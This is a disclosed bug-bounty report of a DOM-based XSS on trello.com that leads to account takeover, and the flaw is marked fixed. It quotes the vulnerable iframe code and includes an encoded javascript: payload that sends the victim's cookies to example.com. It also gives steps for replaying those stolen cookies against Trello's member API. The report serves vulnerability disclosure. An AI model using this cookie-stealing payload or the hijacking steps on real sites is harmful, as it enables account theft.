Account Takeover at https://trello.com

Disclosed by
AnkitSingh
  • Engagement Trello
  • Disclosed date over 1 year ago
  • Reward $3,600
  • Priority P2 Bugcrowd's VRT priority rating
  • Status Resolved This vulnerability has been accepted and fixed
Summary by Trello

Reflected XSS vulnerability in Trello

Summary by AnkitSingh

Description -:

I've found a DOM based XSS within the context of https://trello.com (one of the Atlassian assets) using which an attacker can takeover any Trello account.

Vulnerable code :

As can be seen at https://d2k1ftgv7pobq7.cloudfront.net/meta/u/res/integrations/teams/js/7c73829d4a38a434bed5d0ff245cbd1b/tab-content-configurable.js, that the provided content is loaded within an iframe without prior validation -:

displayTrelloBoardIframe = () => {
        const a = `${contentUrl}?iframeSource=msteams`,
            o = document.getElementById("trello-board");
        o.style.width = "100%", o.style.height = "100%", $("#trello-board").append('<div class="switchViews"><iframe id="trelloIframe" x-frame-options:SAMEORIGIN sandbox="allow-forms allow-modals allow-popups allow-popups-to-escape-sandbox allow-pointer-lock allow-scripts allow-same-origin" allow="geolocation *; microphone *; camera *; midi *; encrypted-media *;" data-tid="embeddedPageContainerIframe" acc-tabbable=true allowfullscreen="" src="' + a + '"></iframe></div>')
    }

Proof of Concept -:

As a victim :

1) Visit at -:

https://trello.com/integrations/teams/tab-content?contentUrl=javascript:decodeURIComponent('%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%60%68%74%74%70%73%3a%2f%2f%65%78%61%6d%70%6c%65%2e%63%6f%6d%3f%70%61%72%61%6d%3d%60%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e')//

Observe your cookies got stolen to example.com

As an attacker :

1) Copy the cookie values stolen at example.com within the parameter param.

2) Now at a private/incognito window of your browser, make a GET request towards https://trello.com/1/Members/me?tokens=all&sessions=all&credentials=all&logins=true&enterprises=true&enterprise_fields=prefs&token_plugins=true and intercept then send to repeater. Append the stolen cookie values within this request and observe the response containing the victim's details.

NOTE that this escalation in the form of session hijacking further demonstrates that HTTPonly flags are not there at cookie. Also, within the stolen values at example.com, observe a cookie by the name of token. It is basically the CSRF token of the victim.

Impact -:

Consequently, this gives the attacker the capability to become the admin of associated workspace.

It would be unfortunate if such a cookie stealing URL is Emailed to mass users or is posted at public forum/blogs in the form of comments etc. All it would require from the victim end would be a single click to hand over their account to attacker.

Activity